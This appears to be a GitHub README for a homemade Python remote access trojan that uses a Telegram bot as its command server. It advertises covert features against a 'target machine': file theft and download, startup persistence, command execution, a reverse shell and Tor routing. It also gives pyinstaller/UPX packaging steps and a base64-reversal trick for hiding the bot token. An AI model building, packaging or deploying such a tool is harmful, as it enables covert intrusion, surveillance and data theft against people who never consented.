A simple python rat that uses Telegram API as a back-end server
this is a very simple remote access trojan (RAT) that uses Telegram API as the back-end server ! actually this is a mix of some older versions available on the github (Its OpenSource Dude :xD) and i had added some new features ...
i hope you like it , contact me if you have any idea or something
annnd i'm sorry for my bad English !!!
maj0rmil4d <3
some of the features :
==> Download file on the target machine (from direct link)
==> Download file from the target machine
==> Bypass the internet censorship against telegram with tor :)
==> Show IP address of the target machine
==> Show some information about the target machine
==> Power off the target machine
==> Make this tool persistent by adding the exe file to the startup path !
==> Show a message box on the target macine
==> Change functionality of mouse buttons
==> Run command prompt commands
==> It can give you a reverse shell from the target machine (risky !)
==> It can make the computer target to speak
to convert py file to exe :
use pyinstaller
syntax :
pyinstaller.exe --onefile --upx-dir C:\windows\system32 .\simple.spec
hint : " don't forget to change paths in the siple.spec file"
to install autopy :
Search the fucking google man !
used packages :
from telegram import utils , Bot
from telegram.ext import Updater , CommandHandler
from urllib import urlopen
from platform import uname , node , architecture
from subprocess import Popen , PIPE
from os import path , system , remove , listdir
from socket import socket , AF_INET , SOCK_STREAM
import sys
from binascii import a2b_base64
from autopy import bitmap
import pyttsx
from binascii import b2a_base64
hint : " simply run pip -r install req.txt"
please don't forget to change Token (use @botfather to gain a token) in t.py file :
token = token[::-1]
token = a2b_base64(token)
token = token[::-1]
hint : "just reverse the above functions to create a encoded token and replace it with this one"
and at the end ... i recommend to watch this video :
youtube_link : https://youtu.be/_hJm5CSxFxc
Version : currently its version 1
Improvements : lots of ideas in my mind that i would like to add them in future
Contact me :
Website :
social media :
email :
[email protected]
Special Thanks to :
Commander <3 , Mobin , jok3r , Ehsan , and all of my other lovely firends
and thanks to my fucking university cause this was my finnal project for that shitty place :D
as you know , i don't take responsibility for any illegal activity
me and my friends ... you and the whole world , GoOdLuck <3